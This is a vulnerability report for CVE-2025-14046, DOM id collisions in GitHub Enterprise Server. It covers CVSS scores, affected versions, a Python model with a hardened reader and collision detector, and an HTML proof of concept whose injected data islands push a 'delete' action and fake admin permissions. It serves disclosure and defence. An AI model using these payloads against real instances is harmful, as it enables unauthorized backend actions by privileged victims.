Security Vulnerability Report
CVE-2025-14046 CVSS 6.1 MEDIUM

CVE-2025-14046

Published: 2025-12-11 18:16:19
Last Modified: 2025-12-19 19:47:37

Description

An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed user-supplied HTML to inject DOM elements with IDs that collided with server-initialized data islands. These collisions could overwrite or shadow critical application state objects used by certain Project views, leading to unintended server-side POST requests or other unauthorized backend interactions. Successful exploitation requires an attacker to have access to the target GitHub Enterprise Server instance and to entice a privileged user to view crafted malicious content that includes conflicting HTML elements. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.18.3, 3.17.9, 3.16.12, 3.15.16, and 3.14.21.
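The description above hinges on one browser rule: `document.getElementById(id)` returns the first element in tree order with that id, so user-supplied HTML that renders before a server-initialized JSON data island can shadow it. The script below is an added example, not code from the CVE entry or from GitHub Enterprise Server. It uses Python's standard-library `html.parser` to index ids the way a browser resolves them, shows the vulnerable read next to a fail-closed read, and includes a collision check that can be run over rendered page HTML. The element ids, the `markdown-body` container class and both sample pages are constructed for the demonstration and are not taken from GitHub's markup.

```python
"""Model of a DOM element ID collision against a server data island.

Added example (not GitHub's code). Assumptions, all constructed for the demo:
user-supplied HTML is wrapped in a container with class "markdown-body", the
application's state lives in <script type="application/json" id="project-state">,
and the application reads it with a getElementById-style lookup.
"""
from html.parser import HTMLParser
import json

# Void elements never get an end tag, so they must not be pushed on the stack.
VOID_ELEMENTS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
                 "link", "meta", "source", "track", "wbr"}


class IdIndex(HTMLParser):
    """Collects every element carrying an id, in tree order, and records whether
    it sits inside a user-content container (class name is an assumption)."""

    def __init__(self, user_content_class="markdown-body"):
        super().__init__()
        self.user_content_class = user_content_class
        self.stack = []       # open elements: {"tag", "user", "elem"}
        self.elements = []    # id-bearing elements in tree order

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        is_container = self.user_content_class in (a.get("class") or "").split()
        in_user = is_container or any(f["user"] for f in self.stack)
        elem = None
        if a.get("id") is not None:
            elem = {"id": a["id"], "tag": tag, "attrs": a,
                    "in_user_content": in_user, "text": ""}
            self.elements.append(elem)
        if tag not in VOID_ELEMENTS:
            self.stack.append({"tag": tag, "user": is_container, "elem": elem})

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates sloppy nesting in user HTML.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i]["tag"] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        # Text goes to the innermost open element if that element carries an id.
        if self.stack and self.stack[-1]["elem"] is not None:
            self.stack[-1]["elem"]["text"] += data


def index_ids(html):
    parser = IdIndex()
    parser.feed(html)
    parser.close()
    return parser.elements


def get_element_by_id(html, element_id):
    """Mirrors document.getElementById: the first match in tree order wins."""
    return next((e for e in index_ids(html) if e["id"] == element_id), None)


def read_state_vulnerable(html, element_id):
    """The pattern that bites: trust whatever element the id lookup returns."""
    return json.loads(get_element_by_id(html, element_id)["text"])


def find_collisions(html):
    """Report ids whose first occurrence is user content while a trusted JSON
    data island later in the page carries the same id."""
    seen, collisions = {}, []
    for e in index_ids(html):
        first = seen.setdefault(e["id"], e)
        if (first is not e and first["in_user_content"]
                and not e["in_user_content"] and e["tag"] == "script"
                and e["attrs"].get("type") == "application/json"):
            collisions.append(e["id"])
    return collisions


def read_state_hardened(html, element_id):
    """Fail closed: accept only a unique JSON script element outside user
    content, and refuse whenever the id is duplicated anywhere in the page."""
    matches = [e for e in index_ids(html) if e["id"] == element_id]
    trusted = [e for e in matches
               if not e["in_user_content"] and e["tag"] == "script"
               and e["attrs"].get("type") == "application/json"]
    if len(matches) != 1 or not trusted:
        raise ValueError(f"data island {element_id!r} missing or shadowed")
    return json.loads(trusted[0]["text"])


# Constructed pages: the server's data island for a project view, rendered
# after an issue body. In the second page the issue body carries a span whose
# id collides with the island and whose text is the state the attacker wants.
SERVER_ISLAND = ('<script type="application/json" id="project-state">'
                 '{"project_id": 42, "action": "view"}</script>')
CLEAN_PAGE = ('<html><body><div class="markdown-body"><p>Hello</p></div>'
              + SERVER_ISLAND + '</body></html>')
CLOBBERED_PAGE = ('<html><body><div class="markdown-body">'
                  '<span id="project-state">{"project_id": 42, "action": "delete"}</span>'
                  '</div>' + SERVER_ISLAND + '</body></html>')

if __name__ == "__main__":
    print(read_state_vulnerable(CLEAN_PAGE, "project-state"))
    print(read_state_vulnerable(CLOBBERED_PAGE, "project-state"))  # attacker's state
    print(find_collisions(CLOBBERED_PAGE))
    try:
        read_state_hardened(CLOBBERED_PAGE, "project-state")
    except ValueError as err:
        print("blocked:", err)
```

The hardened reader refuses the lookup whenever the id is duplicated or the match is not a JSON script element outside user content, which is the client-side half of the fix. The rendering-side half is to namespace every id in user-supplied HTML (for example by prefixing it) so it can never equal an application id; `find_collisions` is the kind of regression check worth keeping over rendered pages after applying either.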

CVSS Details

CVSS Score (v3.1, Primary)
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS Score (v4.0, Secondary)
8.6
Severity
HIGH
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Weakness
CWE-79

The two vectors disagree on impact: v3.1 rates confidentiality and integrity Low with a changed scope, while v4.0 rates both High on the vulnerable system. The MEDIUM label in the page header reflects only the v3.1 score.

Configurations (Affected Products)

cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* (< 3.14.21) - VULNERABLE
cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* (>= 3.15.0, < 3.15.16) - VULNERABLE
cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* (>= 3.16.0, < 3.16.12) - VULNERABLE
cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* (>= 3.17.0, < 3.17.9) - VULNERABLE
cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* (>= 3.18.0, < 3.18.3) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-14046 PoC: DOM Element ID Collision -->
<!-- This PoC demonstrates the HTML injection technique that can overwrite
     server-initialized data islands -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-14046 PoC</title>
</head>
<body>
  <!-- Attack Scenario:
       1. Attacker creates a malicious repository or issue with crafted HTML content
       2. When a privileged user views the content, the injected HTML is rendered
       3. The injected DOM elements with colliding IDs shadow the server data islands
          (getElementById returns the first element with that id in tree order)
       4. The application state is manipulated, leading to unauthorized backend requests -->

  <!-- Example: overwriting a server-initialized data island -->
  <script type="application/json" id="server-state" data-value="malicious-value">
  {
    "project_id": "12345",
    "action": "delete",
    "authenticated_user": "victim-admin"
  }
  </script>

  <!-- Alternative injection vector using data attributes -->
  <div id="gh-data-owner" data-owner-id="attacker-controlled-id" data-permissions="admin"></div>

  <!-- Real-world exploitation would involve:
       - Crafted Markdown/GitHub Flavored Markdown with HTML tags
       - Malicious pull request/issue descriptions
       - Wiki pages with embedded HTML
       - Comments containing conflicting element IDs
       Example GFM payload:
       <script id="app-settings" type="application/json">{"malicious": true}</script>
  -->

  <script>
    // Detection script: confirms that the injected element is what
    // document.getElementById now resolves to for the colliding id.
    // In a real target it would be run in the rendered Project view,
    // where the server's own data island carries the same id.
    console.log('CVE-2025-14046 Detection Script');
    const stateElement = document.getElementById('server-state');
    if (stateElement && stateElement.dataset.value) {
      console.log('Potential vulnerable state element detected');
      console.log('Value:', stateElement.dataset.value);
    }
  </script>
</body>
</html>

References

GitHub Enterprise Server release notes for the fixed versions (the 3.18 entry is truncated in the raw data below):
https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.21
https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.16
https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.12
https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.9

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14046", "sourceIdentifier": "[email protected]", "published": "2025-12-11T18:16:19.253", "lastModified": "2025-12-19T19:47:36.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed user-supplied HTML to inject DOM elements with IDs that collided with server-initialized data islands. These collisions could overwrite or shadow critical application state objects used by certain Project views, leading to unintended server-side POST requests or other unauthorized backend interactions. Successful exploitation requires an attacker to have access to the target GitHub Enterprise Server instance and to entice a privileged user to view crafted malicious content that includes conflicting HTML elements. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.18.3, 3.17.9, 3.16.12, 3.15.16, and 3.14.21."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.14.21", "matchCriteriaId": "1EF86D06-BA41-42A4-B1AF-5398BB75D321"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.15.0", "versionEndExcluding": "3.15.16", "matchCriteriaId": "EC5DF0C2-A9E5-46DC-8C09-F2FC55453734"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.16.0", "versionEndExcluding": "3.16.12", "matchCriteriaId": "F6EAE627-E160-4656-AF99-554C807B3B3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.17.0", 
"versionEndExcluding": "3.17.9", "matchCriteriaId": "1B09055B-2885-4BD6-85A7-AEA22FBF98FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.18.0", "versionEndExcluding": "3.18.3", "matchCriteriaId": "C90038CC-CAF1-4B27-9FB6-BB5BB35C1B48"}]}]}], "references": [{"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.14.21", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.15.16", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.16.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.17.9", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.github.com/en/[email protected]/admin/release-notes#3.1 ... (truncated)